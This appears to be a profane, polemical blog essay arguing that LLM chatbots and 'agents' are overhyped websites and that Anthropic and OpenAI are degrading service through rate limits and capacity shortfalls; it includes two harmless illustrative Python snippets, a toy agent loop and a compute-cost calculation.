Posts in Python (20 found)

I Will Never Respect A Website

If you like this piece and want to support my independent reporting and analysis, why not subscribe to my premium newsletter? It’s $70 a year, or $7 a month, and in return you get a weekly newsletter that’s usually anywhere from 5,000 to 18,000 words, including vast, detailed analyses of NVIDIA, Anthropic and OpenAI’s finances, and the AI bubble writ large. I recently put out the timely and important Hater’s Guide To The SaaSpocalypse, another on How AI Isn’t Too Big To Fail, and a deep (17,500-word) Hater’s Guide To OpenAI. Subscribing to premium is both great value and makes it possible to write these large, deeply-researched free pieces every week.

Soundtrack: Muse — Stockholm Syndrome

I think the most enlightening thing about AI is that it shows you how even the most mediocre text inspires some sort of emotion. Soulless LinkedIn slop makes you feel frustration with a person for their lack of authenticity, but you can still imagine how they forced it out of their heads. You still connect with them, even if it’s in a bad way.

AI copy is dead. It is inert. The reason you can spot it is that it sounds hollow. I don’t care that a website says stuff because I typed into it, just like I don’t care if it responds in a way that sounds human, because it all feels like nothing to me.

I am not here to give a website respect, I will not be impressed by a website, nor will I grant a website any extra credit if it can’t do the right thing every time. The computer is meant to work for me. If the computer doesn’t do what I want, I change the kind of computer I use. LLMs will always hallucinate, their outputs are untrustworthy as a result, they cannot be deterministic, and any chance of any mistake of any kind is unforgivable. I don’t care how the website made you feel: it’s a machine that doesn’t always work, and that’s not a very good machine.

I feel nothing when I see an LLM’s output. Tell me thank you or whatever, I don’t care. You’re a website. Oh, you can spit out code? Amazing. Still a website.

Perhaps you’ve found value in LLMs. Congratulations! You should feel no compulsion to convince me, nor should you feel any pride in using a particular website. And if you feel you’re being judged for using AI, perhaps you should ask why you feel so vilified. Did the industry do something to somehow warrant judgment? Is there something weird or embarrassing about the product, such as its famous propensity to get things wrong? Perhaps it loses billions of dollars? Oh, it’s damaging to the environment too? And people are telling outright lies about it and constantly saying it’ll replace people’s jobs? And the CEOs are all greedy, oafish sociopaths?

Did you try being cloying, judgmental, condescending, and aggressive to those who don’t like AI? Oh, that didn’t work? I can’t imagine why.

Sounds embarrassing! You must really like that website.

ChatGPT is a website. Claude is a website. While I guess Claude Code runs in a terminal window, that just means it’s an app, which I put in exactly the same mental box as a website.

Yet everything you read or hear or see about AI does everything it can to make you think that AI is something other than a website or an app. People who “discover the power of AI” immediately stop discussing it in the same terms as Microsoft Word, Google, or any other app or website.
It’s never just about what AI can do today, but always about some theoretical “AGI” or vague shit about “AI agents” that are some indeterminate level of “valuable” without anyone being able to describe why. Truly useful technology isn’t described in oblique or hyperbolic terms. For example, last week, IBM’s Dave McCann described using a series of “AI agents” to Business Insider.

Sounds like a website to me. Sounds like a website using an LLM to summarize stuff to me. Why are we making all this effort to talk about what a website does?

My friend, this isn’t a “series of agents.” It’s an LLM that looks at stuff and spits out an answer. Chatbots have done this kind of thing forever. These aren’t “agents.” “Agents” makes it sound like there’s some sort of futuristic autonomous presence rather than a chatbot that’s looking at documents using technology that’s guaranteed to hallucinate incorrect information. Here’s a fun exercise: replace the word “agent” with “app,” and replace “AI” with “application.” In fact, let’s try that with the next quote: a variety of functions including searching for stuff, looking at stuff, generating stuff, transcribing a meeting, and searching for stuff. Wow! Who gives a fuck. Every “AI agent” story is either about code generation, summarizing some sort of information source, or generating something based on an information source that you may or may not be able to trust.

“Agent” is an intentional act of deception, and even “modern” agents like OpenClaw and its respective ripoffs ultimately boil down to “I can send you a reminder” or “I can transcribe a text you send me.” Yet everybody seems to want to believe these things are “valuable” or “useful” without ever explaining why. A page of OpenClaw integrations claiming to share “real projects, real automations [and] real magic” includes such incredible, magical use cases as “reads my X bookmarks and discusses them with me,” “check incoming mail and remove spam,” “researches people before meetings and creates briefing docs,” “schedule reminders,” “tracking who visits a website” (summarizing information), and “using voice notes to tell OpenClaw what to do,” which includes “distilling market research” (searching for stuff) and “tightening a proposal” (generating stuff after looking at it).

I’d have no quarrel with any of this if it wasn’t literally described as magical and innovative. This is exactly the shit that software has always done — automations, shortcuts, reminders, and document work. Boring, potentially useful stuff done in an inefficient way requiring a Mac Mini and hundreds of dollars a day of API calls.

Even Stephen Fry’s effusive review of the iPad from 2010, in referring to it as a “magical object,” still called it “class,” “a different order of experience,” remarking on its speed, responsiveness and “smooth glide,” and on how simple it was. Even Fry, a writer beloved for his effervescence and sophisticated lexicon, was able to point at the things he liked (such as the design and simplicity) in clear terms. Even while couching it in terms of the future, Fry could cogently explain why he was excited about the present.

Conversely, articles about Large Language Models and their associated products often describe them in one of three ways: as if their ability to try to do some of a task allows them to do the entire task; as if their ability to do tasks is somehow impressive or a justification for their cost; or as an excuse for why they cannot do more, hinged on something happening in the future. This simply doesn’t happen outside of bubbles.
The original CNET review of the iPhone — a technology I’d argue literally changed the way that human beings live their lives — still described it in terms that mirrored the reality we live in. I’d argue that technologies like cloud storage, contactless payments, streaming music and video, and digital photography transformed our societies in ways that were obvious from the very beginning. Nobody sat around cajoling us to accept that we’d need to sunset our Nokia 3210s and get used to touchscreens, because it was blatantly obvious, the moment you used the first iPhone, that it was better. Nobody ostracized you for not being sufficiently excited about iPhone apps.

Git, launched in 2005, is arguably one of the single most transformational technologies in tech history, changing how software engineers built all kinds of software. And I’d argue that GitHub, which came a few years later, was equally transformational. I can’t find a single example of somebody being shamed for not being sufficiently excited, other than people arguing over whether Git was the superior version control software, or saying that GitHub, a cloud-based repository for code and collaboration, was obvious in its utility. Those that liked it didn’t feel particularly defensive. Even articles about GitHub’s growth spoke entirely in terms rooted in the present.

I realize this was before the hyper-polarized world of post-Musk Twitter, one where venture capital and the tech industry in general were a fraction of their current size, but it’s really weird how different it feels when you read how the stuff that actually mattered was covered. I must repeat that this was a very different world with very different incentives. Today’s tech industry is a series of giant group chats across various social networks and physical locations, with a much larger startup community (Y Combinator’s last batch had 199 companies — the first had 8) influenced heavily by the whims of investors and the various cults of personality in the valley. While social pressure absolutely existed, the speed at which it could manifest and mutate was minute in comparison to the rabid dogs of Twitter or the current state of Hacker News. There were fewer VCs, too.

In any case, no previous real or imagined tech revolution — outside of cryptocurrency, an industry with obvious corruption and financial incentives — has ever inspired such eager defensiveness, tribalism or outright aggression toward dissenters, nor such ridiculous attempts to obfuscate the truth about a product. We’ve never had a cult of personality around a specific technology at this scale.

There is something that AI does to people — in the way it functions and the way that people react to it — that inspires them to act defensively, weirdly, tribally. I think it starts with LLMs themselves, and the feeling they create within a user. We all love prompts. We love to be asked questions about ourselves. We feel important when somebody takes an interest in what we’re doing, and even more so when they remember things about it and seem to be paying attention. LLMs are built to focus themselves completely on us, and to do so while affirming every single interaction.

Human beings also naturally crave order and structure, which means we’ve created frameworks in our heads for what authoritative-sounding or -looking information looks like, and for the language that engenders trust in it.
We trust Wikipedia both because it’s an incredibly well-maintained library of information riddled with citations and because it tonally and structurally resembles an authoritative source. Large Language Models have been explicitly trained (on much of the internet, including Wikipedia) to deliver information in a structured manner that makes us trust it like we would another such source, massaged with the language we’d expect from a trusted friend or an endlessly-patient teacher. All of this is done with the intention of making you forget that you’re using a website.

And that deception is what starts to make people act strangely. The fact that an LLM can maybe do something is enough to make people try it, along with the constant pressure from social media, peers and the mainstream media. Some people — such as myself — have used LLMs to do things, seen that making them do said things isn’t going to happen very easily, and walked away, because I am not going to use a website that doesn’t do what it says.

As I’ve previously said, technology is a tool to do stuff. Some technology requires you to “get used to it” — iPhones and iPads were both novel (and weird) in their time, as was learning to use the ZSA Moonlander keyboard — but basically no example involves tolerating the inherent failings of the underlying product under the auspices of it “one day being better.” Nowhere else in the world of technology does someone gaslight you into believing that the problems don’t exist or will magically disappear. It’s not as if the iPhone only occasionally allowed you to successfully take a photo, and reliable photography was something you’d have to wait until the iPhone 3GS to enjoy. While picture quality improved over time, every generation of iPhone did the same basic things successfully, reliably, and consistently.

I also think that the challenge of making an LLM do something useful is addictive and transformative. When people say they’ve “learned to use AI,” they often mean that they’ve worked out ways to fudge their prompts, navigate its failures, mitigate its hallucinations, and connect it to various APIs and systems of record in such a way that it now, on a prompt, does something — and because they’re the ones who built this messy little process, they feel superior, because the model has repeatedly told them they were smart for doing it and celebrated with them when they “succeeded.”

The term “AI agent” exists as both a marketing term and a way to ingratiate the user. Saying “yeah, I used a chatbot to do some stuff” sounds boring, like you’re talking to an app or a website, but “using an AI agent” makes you sound like a futuristic cyber-warrior, even though you’re doing exactly the same thing. LLMs are excellent digital busyboxes for those who want to come up with a way to work differently rather than actually doing work.

In WIRED’s article about journalists using AI, Alex Heath boasts that he “feels like he’s cheating in a way that feels amazing”:

The linguistics of “transmitting an idea to an AI agent” misrepresent what is a deeply boring and soulless experience. Alex speaks into a microphone, his words are transcribed, then an LLM burps out a draft. A bunch of different services connect to Claude Cowork and a text document (that’s what the “custom set of instructions” is) that says how to write like him, and then it writes like him, and then he talks to it, and then sometimes he writes bits of the story himself. This is also most decidedly not automation.
Heath still must sit and prompt a model again and again. He must still maintain connections to various services and make sure the associated documents in Notion are correct. He must make sure that Granola actually gets the transcriptions from his interviews. He must (I would hope) still check both the AI transcription and the output from the model to make sure quotes are accurate. He must make sure his calendar reflects accurate information. He must make sure that Claude still follows his “voice and writing style” — if you can call it that, given the amount of distance between him and the product. Well, Alex, you’re not telling anybody anything; your ideas and words come out of a Large Language Model that has convinced you that you’re writing them.

In any case, Heath’s process is a great example of what makes people think they’re “using powerful AI.” Large Language Models are extremely adept at convincing human beings to do most of the work and then credit “AI” with the outcomes. Alex’s process sounds convoluted and, if I’m honest, a lot more work than the old way of doing things. It’s like writing a blog using the breakfast machine from Pee-wee’s Playhouse. I couldn’t eat breakfast that way every morning. I bet it would get old pretty quick.

This is the reality of the Large Language Model era. LLMs are not “artificial intelligence” at all. They do not think, and they do not have knowledge; they are conjuring up their own training data (or reflecting post-training instructions from those developing them, or documents instructing them to act a certain way), and any time you try to make them do something more complicated, they begin to fall apart and/or become exponentially more expensive.

You’ll notice that most AI boosters have some sort of bizarre, overly-complicated way of explaining how they use AI. They spin up “multiple agents” (chatbots) that each have their own “skills document” (a text document) and connect “harnesses” (Python scripts, text files that tell it what to do, a search engine, an API) that “let it run agentic workflows” (query various tools to get an outcome).

The so-called “agentic AI” that is supposedly powerful and autonomous is actually incredibly demanding of its human users — you must set it up in so many different ways, connect it to so many different services, check that every “agent” (a different chatbot) is instructed in exactly the right way, and make sure that none of these agents cause problems (they will) with each other. Oh, and don’t forget to set certain ones to “high thinking” for certain tasks, make sure that “easier” tasks are given to cheaper models, and make sure those models are prompted as necessary so they don’t burn tokens.

But the process of setting up all those agents is so satisfying, and when they actually succeed in doing something — even if it took fucking forever, cost a bunch, and was incredibly inefficient — you feel like a god! And because you can “spin up multiple agents,” each one ready and waiting for you to give it commands (and ready to affirm each and every one of them), you feel powerful, like you’re commanding an army that also requires you to monitor whatever it does.

The reason that LLMs have become so interesting to software engineers is that this is already how they lived. Writing software is often a case of taping together different systems and creating little scripts and automations that make them all work, and the satisfaction of building functional software is incredible, even at the early stages.
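To be clear about how little sits behind that vocabulary: a “multi-agent system” with a “skills document” and a “harness” can be sketched in a few dozen lines of Python. This is a toy illustration, not any vendor’s actual API; call_llm is a hypothetical stand-in for whatever chat-completion endpoint you pay for, and skills.txt is the “skills document” (a text file).

```python
# Toy sketch of an "agent": a system prompt (a text file), a loop
# around an LLM call, and some glue functions (the "harness").
# call_llm() is a hypothetical stand-in for any chat-completion API.
from pathlib import Path

def call_llm(system: str, messages: list[dict]) -> str:
    """Hypothetical: POST to your vendor's chat endpoint, return text."""
    raise NotImplementedError("swap in your provider's client here")

def run_tool(name: str, argument: str) -> str:
    """The 'harness': ordinary functions the loop can dispatch to."""
    tools = {
        "search": lambda q: f"(search results for {q!r})",
        "read_file": lambda p: Path(p).read_text(),
    }
    return tools[name](argument)

def agent(task: str, max_steps: int = 5) -> str:
    system = Path("skills.txt").read_text()  # the "skills document"
    messages = [{"role": "user", "content": task}]
    for _ in range(max_steps):
        reply = call_llm(system, messages)
        # If the model asks for a tool ("TOOL search: foo"), run it
        # and feed the result back in; otherwise we're done.
        if reply.startswith("TOOL "):
            name, _, arg = reply[5:].partition(": ")
            messages.append({"role": "user", "content": run_tool(name, arg)})
        else:
            return reply
    return "(gave up)"
```

That is the whole trick: the “skills document” is a string passed as a system prompt, and the “harness” is a dict of ordinary functions.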
Large Language Models perform an impression of automating that process, but for the most part force you, the user, to do the shit that matters, even if that means “being responsible for the code that it puts out.” Heath’s process does not appear to take less time than his previous one — he’s just moved stuff around a bit and found a website to tell him he’s smart for doing so.

They are Language Models interpreting language without any knowledge or thoughts or feelings or ability to learn, and each time they read something they interpret meaning based on their training data, which means they can (and will!) make mistakes — and when one is, say, talking to another chatbot to tell it what to do next, that little mistake might build a fundamental flaw into the software, or just break the process entirely.

And Large Language Models — using the media — exist to try and convince you that these mistakes are acceptable. Anthropic recently launched its Claude for Finance tool, which claims to “automate financial modeling” with “pre-built agents” (chatbots) but really appears to just be able to create questionably-useful models via Excel spreadsheets and do “financial research” based on connecting to documents in your various systems, I imagine with a specific system prompt. Anthropic also proudly announced that it had scored a 55.3% on the Finance Agent Test.

I hate to repeat myself, but I will not respect a website, and I will not tolerate something being “55% good” at something if its alleged use case is that it’s an artificial intelligence.

Yet that’s the other remarkable thing about the LLM era — there are people who are extremely tolerant of potential failures because they believe they’re either A) smart enough to catch them or B) smart enough to build systems that do so for them, with a little sprinkle of “humans make mistakes too,” conflating “an LLM that doesn’t know anything fucking up by definition” with “a human being with experiences and the capacity for adaptation making a mistake.”

I truly have no beef with people using LLMs to speed up Python scripts, do fun little automations or dig through big datasets, but please don’t try to convince me they’re being futuristic by doing so. If you want to learn Python, I recommend reading Al Sweigart’s Automate The Boring Stuff. Anybody who sneers at you and says you are being “left behind” because you’re not using AI should be forced to show you what it is they’ve created or done, and the specific system they used to do so. They should have to show you how much work it took to prepare the system, and why it’s superior to just doing it themselves.

Karpathy also had a recent (and very long) tweet about “the growing gap in understanding of AI capability,” involving more word salad than a fucking Sweetgreen:

Wondering what those “staggering improvements” are? The one tangible (and theoretical!) example Karpathy gives shows how hard people work to overstate the capabilities of LLMs. “Coherently restructuring” a codebase might happen when you feed it to an LLM (while also costing a shit-ton of tokens, but putting that aside), or it might not understand at all because Claude Opus is acting funny that day, or it might sort-of fix it but mess something subtle up that breaks things in the future.
This is an LLM doing exactly what an LLM does — it looks at a block of text, sees whether it matches up with what a user said, sees how that matches with its training data, and then either tells you things to do or generates new code, much like it would if you had a paragraph of text you needed to fact-check. Perhaps it would get some of the facts right if connected to the right system. Perhaps it might make a subtle error. Perhaps it might get everything wrong.

This is the core problem with the “checkmate, boosters — AI can write code!” argument. AI can write code. We knew that already. It gets “better” as measured by benchmarks that don’t really compare to real-world success, and even with the supposedly meteoric improvements over the last few months, nobody can actually explain what the result of it being better is, nor does it appear to extend to any domain outside of coding. You’ll also notice that Karpathy’s language is as ingratiating to true believers as it is vague. Other domains are left unexplained, other than references to “research” and “math.” I’m in a research-heavy business, and I have tried the most powerful LLMs and highest-priced RAG/post-RAG research tools, and every time I find them bereft of any unique analysis or suggestions.

I don’t dispute that LLMs are useful for generating code, nor do I question whether they’re being used by software developers at scale. I just think they would be used dramatically less if there weren’t an industrial-scale publicity campaign run through the media and the majority of corporate America both incentivizing and forcing people to use them. Similarly, I’m not sure anybody would’ve been anywhere near as excited if OpenAI and Anthropic hadn’t intentionally sold them a product that was impossible to support long-term.

This entire industry has been sold on a lie, and as capacity becomes an issue, even true believers are turning on the AI labs. About a year ago, I warned you that Anthropic and OpenAI had begun the Subprime AI Crisis, with both companies creating “priority processing tiers” for enterprise customers (read: AI startups like Replit and Cursor), dramatically increasing the cost of running their services to the point that both had to dramatically change their features as a result. A few weeks later, I wrote another piece about how Anthropic was allowing its subscribers to burn thousands of dollars’ worth of tokens on its $100- and $200-a-month subscriptions, and asked a question at the end.

I was right to ask it: a few weeks ago (as I wrote in The Subprime AI Crisis Is Here), Anthropic added “peak hours” to its rate limits, and users found across the board that they were burning through their limits, in some cases in only a few prompts. Anthropic’s response — after saying it was looking into why rate limits were being hit so fast — was to say that users were ineffectively utilizing the 1-million-token context window and failing to adjust Claude’s “thinking effort level” based on whatever task it was they were doing. Anthropic’s customers were (and remain) furious, as you can see in the replies to its thread on the r/Anthropic subreddit.

To make matters worse, it appears that — deliberately or otherwise — Anthropic has been degrading the performance of both Claude Opus 4.6 and Claude Code itself, with developers, including AMD Senior AI Director Stella Laurenzo, documenting the problem at length (per VentureBeat):

Think that Anthropic cares?
Think again: another developer found that Claude Opus 4.6 was “thinking 67% less than it used to,” and Anthropic didn’t even bother to respond. In fact, Anthropic has done very little to explain what’s actually happening, other than to say that it doesn’t degrade its models to better serve demand.

To be clear, this is far from the only time I’ve seen people complain about these models “getting dumber” — users on basically every AI subreddit will say, at some point, that models randomly can’t do things they used to be able to do, with nobody really having an answer other than “yeah dude, same.”

Back in September 2025, developer Theo Browne complained that Claude had gotten dumber, and Anthropic near-immediately responded to say that the degraded responses were the result of bugs that “intermittently degraded responses from Claude,” adding the following:

Which begs the question: is Anthropic accidentally making its models worse? Because it’s obvious it’s happening, it’s obvious they know something is happening, and their response, at least so far, has been to say that either users need to tweak their settings or nothing is wrong at all. Yet these complaints have gone on for years, and they’ve reached a crescendo with the latest ones, which involve, in some cases, Claude Code burning way more tokens for absolutely no reason, hitting rate limits earlier than expected, or wasting actual dollars spent on API calls.

Some suggest that the problems are a result of capacity issues over at Anthropic, which have led to a stunning (at least for software used by millions of people) amount of downtime, per the Wall Street Journal:

This naturally led to boosters (and, for that matter, the Wall Street Journal) immediately saying that this was a sign of the “insatiable demand for AI compute.”

Before I go any further: if anyone has been taking $2.75 per hour per GPU for any kind of Blackwell GPU, they are losing money. Shit, I think they’re losing it at $4.08 too. While these are examples of on-demand pricing (versus paid-up, years-long contracts like Anthropic buys), if they’re indicative of wider pricing on Blackwell, this is an economic catastrophe.

In any case, Anthropic’s compute constraints are a convenient excuse to start fucking over its customers at scale. Rate limits that were initially believed to be a “bug” are now the standard operating limits of using Anthropic’s services, and its models are absolutely, fundamentally worse than they were even a month ago.

It’s January 14, 2026, and you just read The Atlantic’s breathless hype-slop about Claude Code, believing that it was “bigger than the ChatGPT moment,” that it was an “inflection point for AI progress,” and that it could build whatever software you imagined. While you’re not exactly sure what it is you’re meant to be excited about, your boss has been going on and on about how “those who don’t use AI will be left behind,” and he allows you to pay $200 for a year’s access to Claude Pro.

You, as a customer, no longer have access to the product you purchased. Your rate limits are entirely different, service uptime is measurably worse, and model performance has, for some reason, taken a massive dip. You hit your rate limits in minutes rather than hours. Prompts that previously allowed you a healthy back-and-forth over a project are now either impractical or impossible.
Your boss now has you vibe-coding barely-functional apps as a means of “integrating you with the development stack,” but every time you feed Claude a screenshot of what’s going wrong with the app, you seem to hit your rate limits again. You ask your boss if he’ll upgrade you to the $100-a-month subscription, and he says that “you’ve got to make do, times are tough.” You sit at your desk trying to work out what the fuck to do for the next four hours, as you do not know how to code, and what little you’ve been able to do is now impossible.

This is the reality for a lot of AI subscribers, though in many cases they’ll simply subscribe to OpenAI Codex or another service that hasn’t brought the hammer down on their rate limits. …For now, at least.

The con of the Large Language Model era is that any subscription you pay for is massively subsidized, and any product you use can and will see its service degraded as these companies desperately try to either ease their capacity issues or lower their burn rate. Yet it’s unclear whether “more capacity” means that things will be cheaper, or better, or whether it’s just a way for Anthropic to scale an increasingly-shittier experience.

To explain: when an AI lab like Anthropic or OpenAI “hits capacity limits,” it doesn’t mean that it starts turning away business or stops accepting subscribers, but that current (and new) subscribers will face randomized downtime and model issues, along with increasingly-punishing rate limits. Neither company faces a financial shortfall as a result of being unable to provide its services (rather, they face financial shortfalls because they are providing their services to customers). And yet the only people paying the price for these “capacity limits” are the customers.

This is because AI labs must, when planning capacity, make arbitrary guesses about how large the company will get, and in the event that they acquire too much capacity, they’ll find themselves in financial dire straits, as Anthropic CEO Dario Amodei told Dwarkesh Patel back in February:

What happens if you don’t buy enough compute? Well, you find yourself having to buy it last-minute, which costs more money, which further erodes your margins, per The Information:

In other words, compute capacity is a knife-catching game. Ordering compute in advance lets you lock in a better rate, but having to buy compute at the last minute spikes those prices, eating any margin that might have been gained by serving that extra demand. Order too little compute and you’ll find yourself unable to run stable and reliable services, spiking your costs as you rush to find more capacity. Order too much and you’ll have too little revenue to pay for it.

It’s important to note that the “demand” in question here isn’t revenue waiting in the wings, but customers who are already paying you and want to do more with the product they paid for. More capacity allows you to potentially onboard new customers, but they too face the same problems as your capacity fills. This also begs the question: how much capacity is “enough”? It’s clear that current capacity issues are a result of the inference (the creation of outputs) demands of Anthropic’s users. What does adding more capacity do, other than potentially bringing that under control?

This also suggests that Anthropic’s (and, by extension, OpenAI’s) business model is fundamentally flawed.
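To see why it’s a knife-catching game, here’s a toy back-of-envelope in Python. The $2.75 and $4.08 hourly rates echo the Blackwell numbers mentioned earlier; the revenue figure is invented purely for illustration, and only the shape of the trade-off matters.

```python
# Toy model of the compute-ordering bind. The hourly rates echo the
# Blackwell figures quoted above; revenue per GPU-hour is invented.
CONTRACTED_RATE = 2.75     # $/GPU-hour, locked in years in advance
SPOT_RATE = 4.08           # $/GPU-hour if you scramble last-minute
REVENUE_PER_GPU_HR = 3.00  # what usage earns you (illustrative)

def hourly_margin(demand_gpus: int, ordered_gpus: int) -> float:
    """Margin when pre-ordered capacity serves demand first and any
    overflow has to be bought at the spot rate."""
    overflow = max(demand_gpus - ordered_gpus, 0)
    cost = ordered_gpus * CONTRACTED_RATE + overflow * SPOT_RATE
    return demand_gpus * REVENUE_PER_GPU_HR - cost

print(hourly_margin(1000, 600))   # order too little:  -282.0
print(hourly_margin(1000, 1000))  # order just right:   250.0
print(hourly_margin(1000, 1500))  # order too much:   -1125.0
```

Undershoot and the spot-priced overflow eats the margin; overshoot and the idle contracted GPUs do. The real version of this guess is made years ahead, against demand nobody can forecast.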
At its current infrastructure scale, Anthropic cannot satisfactorily serve its current paying customer base, and even with this questionably-stable farce of a product, Anthropic still expects to burn $14 billion. While adding more capacity might allow new customers to subscribe, those new customers would also add more strain on capacity, which would likely mean that nobody’s service improves but Anthropic still makes money.

It ultimately comes down to the definition of the word “demand.” Let me explain. Data center development is very slow — only 5GW of capacity is under construction worldwide (and “construction” can mean anything from a single steel beam to a near-complete building) — so both Anthropic and OpenAI are planning and paying for capacity years in advance based on “demand.” “Demand” in this case doesn’t just mean “people who want to pay for services,” but “the amount of compute that the people who pay us now, and may pay us in the future, will need for whatever it is they do.”

The amount of compute a user consumes varies wildly based on the model they choose and the task in question — a source at Microsoft told me in the middle of last year that a single user could take up as many as 12 GPUs with a coding task using OpenAI’s o4-mini — which means that, in a very real sense, these guys are guessing and hoping for the best. It also means that their natural choice will be to fuck over their current users to ease their capacity issues, especially when those users are paying on a monthly or — ideally — annual basis. OpenAI and Anthropic need to show continued revenue growth, which means they must have capacity available for new customers, which means that old customers will always be the first to be punished. We’re already seeing this with OpenAI’s new $100-a-month subscription, a kind of middle ground between its $20- and $200-a-month ChatGPT subscriptions that appears to have immediately reduced rate limits for $20-a-month subscribers.

To obfuscate the changes further, OpenAI also launched a bonus rate-limit period through May 31, 2026, telling users on its pricing page that they will have “10x or 20x higher rate limits than Plus” while also featuring a tiny little note that’s very easy for somebody to miss:

This is a fundamentally insane and deceptive way to run a business, and I believe things will only get worse as capacity issues continue. Not only must Anthropic and OpenAI find a way to make their unsustainable and unprofitable services burn less money, but they must also constantly dance with metering out whatever capacity they have to their customers, because the more extra capacity they buy, the more money they lose.

However you feel about what LLMs can do, it’s impossible to ignore the incredible abuse and deception happening to just about every customer of an AI service. As I’ve said for years, AI companies are inherently unsustainable due to the unreliable and inconsistent outputs of Large Language Models and the incredible costs of providing the services. It’s also clear, at this point, that in the lead-up to 2026 Anthropic and OpenAI both offered subscriptions that were impossible to provide at scale at the price and availability they advertised, and that they did so with the intention of growing their revenue to acquire more customers, equity investment and attention.

As a result, customers of AI services have built workflows and habits based on an act of deceit.
While some will say “this is just what tech companies do, they get you in when it’s cheap then jack up the price,” saying so is an act of cowardice and allegiance to the rich and powerful. To be clear, Anthropic and OpenAI need to do this, and they’ve always needed to do this. In fact, the ethical thing to do would’ve been to charge for and restrict the services in line with their actual costs, so that users could have reliable and consistent access to the services in question. As of now, anyone who purchases any kind of AI subscription is subject to the whims of both the AI labs and their ability to successfully manage their capacity, which may or may not involve making the product that a user pays for worse.

The “demand” for AI as it stands is an act of fiction, as much of that demand was conjured up using products that were either cheaper or more available than they can sustainably be. Every one of those effusive, breathless hype-screeds about Claude Code from January or February 2026 is discussing a product that no longer exists. On June 1, 2026, any article or post about Codex’s efficacy must be rewritten, as rate limits will be halved.

While for legal reasons I’ll stop short of the most obvious word, Anthropic and OpenAI are running — intentionally or otherwise — deeply deceitful businesses in which their customers cannot realistically judge the quality or availability of the service long-term. These companies are also clearly aware that their services are deeply unpopular and capacity-constrained, yet they aggressively court and market toward new customers, guaranteeing further service degradation and potential issues with models. This applies even to API customers, who face exactly the same downtime and model-quality issues, all with the indignity of paying on a per-million-token basis, even when Claude Opus 4.6 decides to crap itself while refactoring something, runs token-intensive “agents” to fix simple bugs, or fails to abide by a user’s guidelines.

This is not a dignified way to use software, nor is it an ethical way to sell it.

How can you plan around this technology? Every month some new bullshit pops up. While incremental model gains may seem like a boon, how do you actually say “OK, let’s plan ahead” for a technology that CHANGES, for better or for worse, at random intervals? You’re constantly reevaluating model choices and harnesses and prompts and all kinds of other bullshit that also breaks in random ways because “that’s how large language models work.” Is that fun? Is that exciting? Do you like this? It seems exhausting to me, and nobody seems to be able to explain what’s good about it. How, exactly, does this change?

Right now, I’d guess that OpenAI has access to around 2GW of capacity (as of the end of 2025), and Anthropic around 1GW, based on discussions with sources. OpenAI is already building out around 10GW of capacity with Oracle, as well as locking in deals with CoreWeave ($22.4 billion), Amazon Web Services ($138 billion), Microsoft Azure ($250 billion), and Cerebras (“750MW”). Meanwhile, Anthropic is now bringing on “multiple gigawatts of Google’s next-generation TPU capacity” on top of deals with Microsoft, Hut8, CoreWeave and Amazon Web Services. Both of these companies are making extremely large bets that their growth will continue at an astonishing, near-impossible rate.
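How near-impossible? A quick back-of-envelope sketch using the rough capacity figures above and the “$2 billion a month” revenue figure discussed below (these are the piece’s own estimates, not audited numbers):

```python
# Back-of-envelope on the figures in the surrounding text. These are
# the piece's own rough estimates, not audited financials.
revenue_per_month = 2e9   # "$2 billion a month"
capacity_gw = 2           # OpenAI's rough current capacity

revenue_per_gw = revenue_per_month / capacity_gw  # ~$1B per GW per month

# Capacity on order: ~10GW with Oracle alone, plus the CoreWeave,
# AWS, Azure and Cerebras deals. Try a 10-20GW range for the sketch.
for planned_gw in (10, 20):
    needed = planned_gw * revenue_per_gw
    print(f"{planned_gw}GW implies ~${needed / 1e9:.0f}B/month "
          f"(~${needed * 12 / 1e9:.0f}B/year) to hold today's ratio")
```

That works out to roughly $120 billion to $240 billion a year just to keep the revenue-to-capacity ratio where it is today, which is the context for the revenue projections discussed next.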
If OpenAI has reached “$2 billion a month” (which I doubt it can pay for) with around 2GW of capacity, this means that it has pre-ordered compute assuming it will make $10 billion or $20 billion a month within a few short years, which fits with The Information’s reporting that OpenAI projects it will make $113 billion in revenue in 2028. And if it doesn’t make that much revenue — and also doesn’t get funding or debt to support it — OpenAI will run out of money, much as Anthropic will if that capacity gets built and it doesn’t make tens of billions of dollars a month to pay for it.

I see no scenario where costs come down, or where rate limits are eased. In fact, I think that as capacity limits get hit, both Anthropic and OpenAI will degrade the experience for the user (either through model degradation or rate-limit decay) as much as they can. I imagine that at some point enterprise customers will be able to pay for an even higher priority tier, and that Anthropic’s “Teams” subscription (which allows you to use the same subsidized subscriptions as everyone else) will be killed off, forcing anyone in an organization using Claude Code (and eventually Codex) to pay via the API, as has already happened for Anthropic’s enterprise users.

Anyone integrating generative AI is part of a very large and randomized beta test. The product you pay for today will be materially different in its quality and availability in mere months. I told you this would happen in September 2024. I have been trying to warn you, and I will repeat myself: these companies are losing so much more money than you can imagine, and they are going to twist the knife and take as many liberties with their users and the media as they can on the way down.

It is fundamentally insane that we are treating these companies as real businesses, either in their economics or in the consistency of the product they offer. These are unethical products sold in deceptive ways, both in their functionality and their availability, and to defend them is to help assist in a society-wide con with very few winners. And even if you like this, mark my words — your current way of life is unsustainable, and these companies have already made it clear they will make the service worse, without warning, if they even acknowledge directly that they’ve done so. The thing you pay for is not sustainable at its current price, and they have no way to fix that problem.

Do you not see you are being had? Do you not see that you are being used? Do any of you think this is good? Does any of this actually feel like progress?

I think it’s miserable, joyless and corrosive to the human soul, at least in the way that so many people talk about AI. It isn’t even intelligent. It’s just more software that is built to make you defend it, to support it, to do the work it can’t, so you can present the work as your own but also give it all the credit.

And to be clear, these companies absolutely fucking loathe you. They’ll make your service worse at a moment’s notice and then tell you nothing is wrong.

Anyone using a subscription to OpenAI or Anthropic’s services needs to wake up and realize that their way of life is going away — that rate limits will make current workflows impossible, that prices will increase, and that the product being sold even today is not one that makes any economic sense. Every single LLM product is being sold under false pretenses about what’s actually sustainable and possible long-term.
With AI, you’re not just the product — you’re a beta tester who pays for the privilege. And you’re a mark for untrustworthy con men selling software using deceptive and dangerous rhetoric.

I will be abundantly clear, for legal reasons: it is illegal to throw a Molotov cocktail at anyone, and it is morally objectionable to do so. I explicitly and fundamentally object to the recent acts of violence against Sam Altman. It is also morally repugnant for Sam Altman to somehow suggest that the careful, thoughtful, determined, and eagerly fair work of Ronan Farrow and Andrew Marantz is in any way responsible for these acts of violence. Doing so is a deliberate attempt to chill the air around criticism of AI and its associated companies. Altman has since walked back the comments, claiming he “wishes he hadn’t used” a non-specific amount of the following words:

These words remain on his blog, which suggests that Altman doesn’t regret them enough to remove them. I do, however, agree with Mr. Altman that the rhetoric around AI does need to change.

